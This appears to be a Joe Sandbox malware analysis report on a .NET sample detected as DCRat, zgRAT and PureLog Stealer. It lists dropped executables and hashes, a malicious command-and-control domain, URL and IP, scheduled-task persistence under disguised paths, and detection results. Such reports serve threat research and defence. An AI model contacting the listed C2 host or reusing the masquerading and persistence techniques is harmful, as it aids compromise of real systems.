C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\GoOOBNnj.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\HBUOKBdR.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\IlqWXNCe.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\QPyLHGSL.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\ToOuVQfl.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\XeElcNfe.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\axSbriXt.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\ebskEcaT.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
http://891781cm.renyash.ru/ | 100% | Avira URL Cloud | malware |
http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php | 100% | Avira URL Cloud | malware |
http://891781cm.renyash.ru | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
891781cm.renyash.ru | 104.21.38.84 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                      https://duckduckgo.com/chrome_newtabaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designersGaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                high
                                                http://www.fontbureau.com/designers/?aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bTheaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                      high
                                                      http://www.fontbureau.com/designers?aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                          high
                                                          http://www.tiro.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                              high
                                                              http://www.fontbureau.com/designersaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.goodfont.co.kraXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                    high
                                                                    http://www.carterandcone.comlaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sajatypeworks.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.typography.netDaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                            high
                                                                            http://www.fontbureau.com/designers/cabarga.htmlNaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.founder.com.cn/cn/cTheaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.galapagosdesign.com/staff/dennis.htmaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.founder.com.cn/cnaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmlaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://891781cm.renyash.ru/aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                                        high
                                                                                        http://www.jiyu-kobo.co.jp/aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
http://www.galapagosdesign.com/DPlease | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.fontbureau.com/designers8 | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.fonts.com | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.sandoll.co.kr | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.urwpp.deDPlease | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.zhongyicts.com.cn | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://891781cm.renyash.ru | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000003190000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002B16000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1742549367.000000000313E000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.sakkal.com | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr | Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.38.84 | 891781cm.renyash.ru | United States | 13335 | CLOUDFLARENETUS | true
                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1583022
                                                                                                            Start date and time:2025-01-01 15:01:05 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 10m 56s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:40
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:1znAXdPcM5.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:e656db3deb4cf58570317e64607c5420.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@41/38@1/1
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 71.4%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 51%
                                                                                                            • Number of executed functions: 397
                                                                                                            • Number of non-executed functions: 118
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target Agentcomponentbrokermonitordhcp.exe, PID 7384 because it is empty
                                                                                                            • Execution Graph export aborted for target aXnWbWpBWYJmkhPMHrrUNM.exe, PID 7420 because it is empty
                                                                                                            • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:02:10 | API Interceptor | 12301732x Sleep call for process: aXnWbWpBWYJmkhPMHrrUNM.exe modified
14:02:03 | Task Scheduler | Run new task: Agentcomponentbrokermonitordhcp path: "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe"
14:02:03 | Task Scheduler | Run new task: AgentcomponentbrokermonitordhcpA path: "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe"
14:02:03 | Task Scheduler | Run new task: aXnWbWpBWYJmkhPMHrrUNM path: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
14:02:03 | Task Scheduler | Run new task: aXnWbWpBWYJmkhPMHrrUNMa path: "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
14:02:03 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
14:02:03 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.38.84 | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 250345cm.renyash.ru/sqltemp.php
104.21.38.84 | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT | 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
104.21.38.84 | ZZ2sTsJFrt.exe | malicious | DCRat, PureLog Stealer, zgRAT | 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
104.21.38.84 | 67VB5TS184.exe | malicious | DCRat, PureLog Stealer, zgRAT | 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
104.21.38.84 | gkcQYEdJSO.exe | malicious | DCRat, PureLog Stealer, zgRAT | 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
891781cm.renyash.ru | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
                                                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with very long lines (804), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):804
                                                                                                                  Entropy (8bit):5.885713261616762
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:u2OqsfaYVLxJNKgBC7UNs+1xOY3Q6JMk8ia/zFxauDpssVrLpxUc+fXXaPWZqU:uhVLx1C7kd113Qpkm7VGsVr4fHwbU
                                                                                                                  MD5:075D0FC2B7DDDE25712884CCE17E02E7
                                                                                                                  SHA1:9241444DB70E1D1C2A37907892FE8B8C44FE0E0E
                                                                                                                  SHA-256:E69A80D749C63D83317A73328748D6E14480AC1B9D4963D3F3D98717FD8BEC1A
                                                                                                                  SHA-512:C894BAADB3EE0C402F63C388DAF12D618E4DAB6F92F25E81B1626C29FD109A009AB4D769B93B28791F4D78C9C69CBB5B104F3B613620B4745AD04C10CAAF1187
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with very long lines (883), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):883
                                                                                                                  Entropy (8bit):5.914184037501613
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:/5zm2egx93BULbHYwOCjfv4sW9Zzslyvcqx8SlAb+:lm89KLkCgsWzI8EqZlV
                                                                                                                  MD5:E2D4A4BA97C55C2590E20772BB73B192
                                                                                                                  SHA1:AD62164F9F4CB4B6E8567470CC9601737BD44EF2
                                                                                                                  SHA-256:2C79D4696280E5441EB9B07B64043A8996BD7C16EB26218C7DE9E780F46180E6
                                                                                                                  SHA-512:AEAEEDCBCF1250EE2DEE8189C43E71AEA35B84E270F3150EF757EBBA15A9882FEF45DD98298AFC1E63382870E7FF62E922404D5414CE26998C3CA76599308B41
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):153
                                                                                                                  Entropy (8bit):5.704210212554569
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:2T3AYP7RCGn80ofCZiqFD8VZ8d/EDUC0gfQ/DpHj/r0XMFEBKbdE:2c280ociq5/cD0tDUwG
                                                                                                                  MD5:492ADA87AD56F09D8C3BD3D64E4C582A
                                                                                                                  SHA1:21CB071195A2675730CD1564FF04AA21F4B28CC0
                                                                                                                  SHA-256:4838D857F3E2603134FB5416EA3493C121492B895405693357D4CD172E3A8B29
                                                                                                                  SHA-512:4C52194EAC1ED8140AFA2648277333031C26DA4FC9BF018BA0DF58F31980C4EF20C871EE746833D5E13DB5784E43E6738697DE1B9E522FB4A8C4936ED2393ED7
                                                                                                                  Malicious:false
                                                                                                                  Preview:gBynEUCDuEeefIYjhPmimFyAhKd3sgpT3pRtFoYGsuwDoRvqeyZTMzgaMyG40JVOZLlz0pe20fz1TvVPYxZ4GVGDI1gQiePjZiodq5zyTgcq9oHbd0fDtbHDEhr9INUWQQcuG1ic7kkk3aDdtExr8Lz8a
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):102
                                                                                                                  Entropy (8bit):5.604838547955997
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:/oJ3hPFdQBD2no6EQgUkEaJnuVmQCNrD2xiPRh:AJFFdYKiwVfUh
                                                                                                                  MD5:DAC7A6FB35F39A9C6540CFE41703C204
                                                                                                                  SHA1:63DD1D81F1E423EAE347E768310CE255563A7287
                                                                                                                  SHA-256:0A74E08820F05437F913DFCC6BE05D2E824054CC338AC1830330DEDD272E74FE
                                                                                                                  SHA-512:5F277756FA4EFE8E913C93E1BDAB0122FC654D52AA90FD80E1C41E84E9D0ABB13DA8010D3CC66B94A4E3E0EA27F3404FBAD73209996AC85F846283271533E6A0
                                                                                                                  Malicious:false
                                                                                                                  Preview:asMWUlRDGI0hKodNPDamYEbeUgcZOG4eXx9URXuLa5EqH3avpAlmpkrVRsCyJ2yANWJXoI62TOMd9uWaFquNfSzxGoDjU5BhGEcvtD
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1396
                                                                                                                  Entropy (8bit):5.350961817021757
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                  Malicious:false
